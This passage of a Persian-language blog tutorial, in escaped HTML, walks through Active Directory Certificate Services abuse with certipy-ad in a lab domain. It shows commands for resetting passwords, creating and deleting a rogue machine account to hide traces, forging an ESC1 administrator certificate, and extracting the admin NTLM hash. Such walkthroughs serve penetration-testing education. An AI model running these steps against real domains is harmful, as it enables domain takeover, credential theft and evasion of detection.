\u062d\u0633\u0627\u0628\u200c\u0647\u0627<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u062a\u0627\u06cc\u06cc\u062f \u0645\u062c\u0648\u0632\u0647\u0627\u06cc \u062e\u0648\u062f\u060c \u062d\u0627\u0644\u0627 \u0627\u0642\u062f\u0627\u0645 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. \u0627\u06a9\u0646\u0648\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u0632 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0628\u0631\u0627\u06cc \u0646\u0634\u0627\u0646 \u062f\u0627\u062f\u0646 \u0646\u062d\u0648\u0647 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u062d\u0633\u0627\u0628\u200c\u0647\u0627 \u062a\u0648\u0633\u0637 \u062e\u0648\u062f\u0645\u0627\u0646 \u06cc\u0627 \u0645\u062f\u06cc\u0631\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645:<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0628\u0647 \u0645\u062f\u06cc\u0631 (Administrator) \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0648 \u0628\u0627\u0632\u0646\u0634\u0627\u0646\u06cc \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 sanjeet \u0628\u0647 Password@12 \u062f\u0631 Domain Controller \u0645\u0634\u062e\u0635\u200c\u0634\u062f\u0647 (\u06f1\u06f9\u06f2\u066b\u06f1\u06f6\u06f8\u066b\u06f1\u066b\u06f2\u06f0) \u0627\u0642\u062f\u0627\u0645 \u06a9\u0646\u062f\u060c \u06a9\u0647 \u0627\u06cc\u0646 \u0639\u0645\u0644 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0627\u0639\u062b \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u062f\u0633\u062a\u0631\u0633\u06cc \u06cc\u0627 \u06a9\u0646\u062a\u0631\u0644 \u0628\u0631 \u062d\u0633\u0627\u0628 sanjeet \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0628\u0639\u062f\u06cc \u0634\u0648\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad account -u Administrator -p Password@1 -dc-ip 192.168.1.20 -target 192.168.1.20 -user sanjeet -pass Password@12 update<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u0631\u062a\u0642\u0627 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u0627\u0632 \u0637\u0631\u06cc\u0642 ESC1)\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0647\u0631 \u06a9\u0627\u0631\u0628\u0631 \u062f\u0627\u0645\u0646\u0647\u200c\u0627\u06cc \u0631\u0627 \u0631\u06cc\u0633\u062a \u06a9\u0646\u06cc\u0645\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u0645\u062f\u06cc\u0631\u0627\u0646\u060c \u06a9\u0647 \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u0639\u062b \u062a\u0633\u0644\u0637 \u0641\u0648\u0631\u06cc \u0628\u0631 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u060c \u06a9\u0646\u062a\u0631\u0644 \u0628\u0631 \u0686\u0646\u062f\u06cc\u0646 \u062d\u0633\u0627\u0628 \u0648 \u062d\u0631\u06a9\u062a \u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc\u06a9 \u0628\u0647 \u0633\u0645\u062a \u062f\u06cc\u06af\u0631 \u062d\u0633\u0627\u0628\u200c\u0647\u0627 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u067e\u0633 \u0627\u0632 \u062a\u0627\u06cc\u06cc\u062f \u0645\u062c\u0648\u0632\u0647\u0627 \u0648 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u062d\u0633\u0627\u0628\u200c\u0647\u0627 \u0631\u0627 \u0628\u0647 \u0631\u0648\u0632 \u06a9\u0631\u062f\u0647 \u0648 \u0627\u0632 \u0627\u06cc\u0646 \u0637\u0631\u06cc\u0642 \u0628\u0647 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u062f\u06cc\u06af\u0631 \u062f\u0633\u062a\u0631\u0633\u06cc \u067e\u06cc\u062f\u0627 \u06a9\u0646\u06cc\u0645 \u06cc\u0627 \u06a9\u0646\u062a\u0631\u0644 \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0648\u0631\u06cc\u0645. \u0627\u06cc\u0646 \u0627\u0645\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u062d\u0645\u0644\u0627\u062a \u067e\u06cc\u0648\u0633\u062a\u0647 \u0648 \u062d\u0631\u06a9\u062a \u062f\u0631 \u0633\u0637\u062d \u062f\u0627\u0645\u0646\u0647 (lateral movement) \u0645\u0646\u062c\u0631 \u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19883\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/4-1-300x33.png\" alt=\"\" width=\"455\" height=\"50\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/4-1-300x33.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/4-1-1024x112.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/4-1-768x84.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/4-1-1536x168.png 1536w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/4-1-150x16.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/4-1.png 1696w\" sizes=\"(max-width: 455px) 100vw, 455px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0627\u06cc\u062c\u0627\u062f \u062d\u0633\u0627\u0628\u200c\u0647\u0627<\/strong><strong> (<\/strong><strong>\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong><strong> ESC8)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0628\u0647 raj \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u06cc\u06a9 \u062d\u0633\u0627\u0628 \u0645\u0627\u0634\u06cc\u0646 \u062c\u062f\u06cc\u062f \u0628\u0647 \u0646\u0627\u0645 BADPC \u0628\u0627 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 Password@2 \u062f\u0631 Domain Controller \u0628\u0627 \u0622\u062f\u0631\u0633 \u06f1\u06f9\u06f2\u066b\u06f1\u06f6\u06f8\u066b\u06f1\u066b\u06f2\u06f0 \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u062f. \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a NTLM relay (ESC8) \u06cc\u0627 \u0628\u0631\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u0646\u062f\u060c \u06a9\u0647 \u0628\u0647 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0627\u0645\u062a\u06cc\u0627\u0632\u0627\u062a \u062f\u0633\u062a\u0631\u0633\u06cc \u0648 \u062d\u0641\u0638 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad account -u raj -p Password@1 -dc-ip 192.168.1.20 -target 192.168.1.20 -user BADPC -pass Password@2 create<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646\u060c \u06a9\u0647 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0645\u062c\u0627\u0632 \u0628\u0647 \u062b\u0628\u062a\u200c\u0646\u0627\u0645 \u062f\u0631 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u062f\u0627\u0645\u0646\u0647 \u0647\u0633\u062a\u0646\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u062a\u0648\u0633\u0637 \u0645\u0627 \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 ESC8 \u062c\u0647\u062a \u062d\u0645\u0644\u0627\u062a NTLM relay\u060c \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u0645\u0627\u0634\u06cc\u0646\u060c \u06cc\u0627 \u062d\u0631\u06a9\u062a \u0628\u0647 \u0633\u0645\u062a DCSync \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc Domain Controller \u0645\u0648\u0631\u062f \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634 \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u0627\u06cc\u062c\u0627\u062f \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646\u060c \u06a9\u0647 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0628\u0631\u0627\u06cc \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0645\u0627\u0634\u06cc\u0646 \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0645\u062c\u0627\u0632 \u0647\u0633\u062a\u0646\u062f\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u062d\u0645\u0644\u0627\u062a \u067e\u06cc\u0686\u06cc\u062f\u0647\u200c\u0627\u06cc \u0645\u0627\u0646\u0646\u062f NTLM relay \u0648 DCSync \u0645\u0646\u062c\u0631 \u0634\u0648\u062f \u06a9\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc\u200c\u0647\u0627\u06cc \u0628\u06cc\u0634\u062a\u0631\u06cc \u0631\u0627 \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0622\u0648\u0631\u062f \u0648 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0628\u0647 \u0635\u0648\u0631\u062a \u067e\u0627\u06cc\u062f\u0627\u0631 \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u0648\u0627\u0631\u062f \u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19884\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/5-1-300x61.png\" alt=\"\" width=\"502\" height=\"102\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/5-1-300x61.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/5-1-1024x209.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/5-1-768x157.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/5-1-150x31.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/5-1.png 1529w\" sizes=\"(max-width: 502px) 100vw, 502px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062d\u0630\u0641 \u062d\u0633\u0627\u0628\u200c\u0647\u0627<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062d\u0633\u0627\u0628 \u0645\u0627\u0634\u06cc\u0646 BADPC \u0631\u0627 \u067e\u0633 \u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u062d\u0630\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad account -u Administrator -p Password@1 -dc-ip 192.168.1.20 -target 192.168.1.20 -user BADPC delete<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0639\u0645\u0644 \u0628\u0631\u0627\u06cc \u067e\u0648\u0634\u0627\u0646\u062f\u0646 \u0631\u062f\u067e\u0627\u0647\u0627 \u067e\u0633 \u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062d\u0633\u0627\u0628 \u0628\u0631\u0627\u06cc \u0627\u0646\u062a\u0642\u0627\u0644 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a NTLM (ESC8)\u060c \u067e\u0646\u0647\u0627\u0646\u200c\u0633\u0627\u0632\u06cc \u06cc\u06a9 \u0645\u0627\u0634\u06cc\u0646 \u06cc\u0627 \u062f\u0631\u06cc\u0627\u0641\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u062b\u0628\u062a\u200c\u0646\u0627\u0645 \u062e\u0648\u062f\u06a9\u0627\u0631 \u0645\u0641\u06cc\u062f \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u062d\u0630\u0641 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u0645\u0627\u0634\u06cc\u0646 \u067e\u0633 \u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 \u062a\u06a9\u0646\u06cc\u06a9 \u0628\u0631\u0627\u06cc \u067e\u0648\u0634\u0627\u0646\u062f\u0646 \u0631\u062f\u067e\u0627\u0647\u0627 \u0648 \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u062d\u0645\u0644\u0627\u062a \u06cc\u0627 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627 \u0645\u0627\u0646\u0646\u062f \u062d\u0645\u0644\u0627\u062a NTLM relay \u0648 \u062f\u0631\u06cc\u0627\u0641\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0628\u0647 \u06a9\u0627\u0631 \u0631\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19885\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/6-300x39.png\" alt=\"\" width=\"508\" height=\"66\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/6-300x39.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/6-1024x133.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/6-768x100.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/6-150x19.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/6.png 1451w\" sizes=\"(max-width: 508px) 100vw, 508px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0627\u0632 \u0627\u0644\u06af\u0648\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u06a9\u0647 \u0642\u0628\u0644\u0627\u064b \u062f\u0631 \u0641\u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06a9\u0634\u0641 \u06a9\u0631\u062f\u06cc\u0645 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627\u060c \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0628\u0647 \u0646\u0627\u0645 Domain Administrator \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u0648 \u0634\u0646\u0627\u0633\u0647\u200c\u0647\u0627\u06cc UPN \u0648 SID \u0627\u0648 \u0631\u0627 \u062f\u0631 \u0622\u0646 \u062c\u0627\u0633\u0627\u0632\u06cc \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. CA (Certificate Authority)\u060c \u0628\u0647 \u062f\u0644\u06cc\u0644 \u06a9\u0646\u062a\u0631\u0644\u200c\u0647\u0627\u06cc \u0636\u0639\u06cc\u0641 \u062f\u0631 \u0627\u0644\u06af\u0648\u060c \u0627\u06cc\u0646 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0631\u0627 \u0628\u062f\u0648\u0646 \u0631\u0627\u0633\u062a\u06cc\u200c\u0622\u0632\u0645\u0627\u06cc\u06cc \u0645\u0646\u0627\u0633\u0628 \u0627\u0645\u0636\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad req -u raj -p Password@1 -dc-ip 192.168.1.20 -target 192.168.1.20 -ca ignite-DC01-CA -template ESC1 -upn 'administrator@ignite.local' -sid 'S-1-5-21-2876727035-1185539019-1507907093-500'<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u0627\u06af\u0631 \u0639\u0645\u0644\u06cc\u0627\u062a \u0645\u0648\u0641\u0642\u06cc\u062a\u200c\u0622\u0645\u06cc\u0632 \u0628\u0627\u0634\u062f\u060c \u0627\u06a9\u0646\u0648\u0646 \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u0645\u0639\u062a\u0628\u0631 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u062f\u0627\u0631\u06cc\u0645 \u06a9\u0647 \u0647\u0648\u06cc\u062a \u06cc\u06a9 \u062d\u0633\u0627\u0628 \u067e\u0631\u0627\u0645\u062a\u06cc\u0627\u0632 \u0631\u0627 \u062c\u0639\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0627\u0644\u06af\u0648\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 (\u0645\u062b\u0644\u0627\u064b ESC1)\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0627\u06cc \u0628\u0631\u0627\u06cc \u06cc\u06a9 \u062d\u0633\u0627\u0628 \u067e\u0631\u0627\u0645\u062a\u06cc\u0627\u0632 \u0645\u0627\u0646\u0646\u062f administrator \u0635\u0627\u062f\u0631 \u06a9\u0631\u062f\u060c \u0628\u062f\u0648\u0646 \u0622\u0646\u200c\u06a9\u0647 \u06a9\u0646\u062a\u0631\u0644\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0627\u0632 \u062c\u0645\u0644\u0647 \u0628\u0631\u0631\u0633\u06cc \u0645\u0627\u0644\u06a9\u06cc\u062a UPN \u06cc\u0627 SID \u0627\u0639\u0645\u0627\u0644 \u0634\u0648\u062f. \u0646\u062a\u06cc\u062c\u0647 \u0627\u06cc\u0646 \u0641\u0631\u0622\u06cc\u0646\u062f\u060c \u0628\u062f\u0633\u062a \u0622\u0648\u0631\u062f\u0646 \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u062c\u0639\u0644\u06cc \u0627\u0645\u0627 \u0645\u0639\u062a\u0628\u0631 \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0627\u062a \u0628\u0639\u062f\u06cc \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19886\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/7-300x65.png\" alt=\"\" width=\"522\" height=\"113\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/7-300x65.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/7-1024x223.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/7-768x167.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/7-150x33.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/7.png 1385w\" sizes=\"(max-width: 522px) 100vw, 522px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0627\u0632 \u0637\u0631\u06cc\u0642 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0641\u0627\u06cc\u0644 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 .pfx \u06a9\u0647 \u0647\u0648\u06cc\u062a Domain Administrator \u0631\u0627 \u062c\u0639\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u0627\u0632 PKINIT \u062f\u0631 \u067e\u0631\u0648\u062a\u06a9\u0644 Kerberos \u0628\u0631\u0627\u06cc \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645. \u0627\u06cc\u0646 \u0631\u0648\u0634 \u0628\u0647\u200c\u0637\u0648\u0631 \u06a9\u0627\u0645\u0644 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0627\u062f\u0645\u06cc\u0646 \u0631\u0627 \u062f\u0648\u0631 \u0645\u06cc\u200c\u0632\u0646\u062f. \u0627\u0632 \u0622\u0646\u062c\u0627 \u06a9\u0647 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 \u062a\u0648\u0633\u0637 \u06cc\u06a9 CA \u0645\u0648\u0631\u062f \u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0645\u0636\u0627 \u0634\u062f\u0647 \u0648 \u0634\u0627\u0645\u0644 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0647\u0648\u06cc\u062a\u06cc \u0645\u062f\u06cc\u0631 \u0627\u0633\u062a\u060c Domain Controller \u0622\u0646 \u0631\u0627 \u0645\u0639\u062a\u0628\u0631 \u062a\u0644\u0642\u06cc \u06a9\u0631\u062f\u0647 \u0648 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0627\u0645\u0644 \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc \u0627\u0639\u0637\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f\u2014\u06a9\u0647 \u0646\u0642\u0637\u0647\u200c\u06cc \u06a9\u0644\u06cc\u062f\u06cc \u062f\u0631 \u0627\u0641\u0632\u0627\u06cc\u0634 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u062d\u0633\u0627\u0628\u200c\u0647\u0627\u06cc \u062d\u0633\u0627\u0633 \u0645\u062d\u0633\u0648\u0628 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.20<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0647\u0634 NTLM \u0631\u0627 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u0628\u06cc\u0634\u062a\u0631 \u062f\u0631 \u0645\u062d\u06cc\u0637 \u062f\u0627\u0645\u0646\u0647 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0628\u062e\u0634\u060c \u0628\u0647 \u06cc\u06a9\u06cc \u0627\u0632 \u0645\u0647\u0645\u200c\u062a\u0631\u06cc\u0646 \u0645\u0631\u0627\u062d\u0644 \u062d\u0645\u0644\u0647 \u0627\u0634\u0627\u0631\u0647 \u0634\u062f\u0647: \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc \u062c\u0639\u0644\u06cc \u0627\u0645\u0627 \u0645\u0639\u062a\u0628\u0631 \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u0628\u0647 \u062f\u0627\u0645\u0646\u0647 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631. 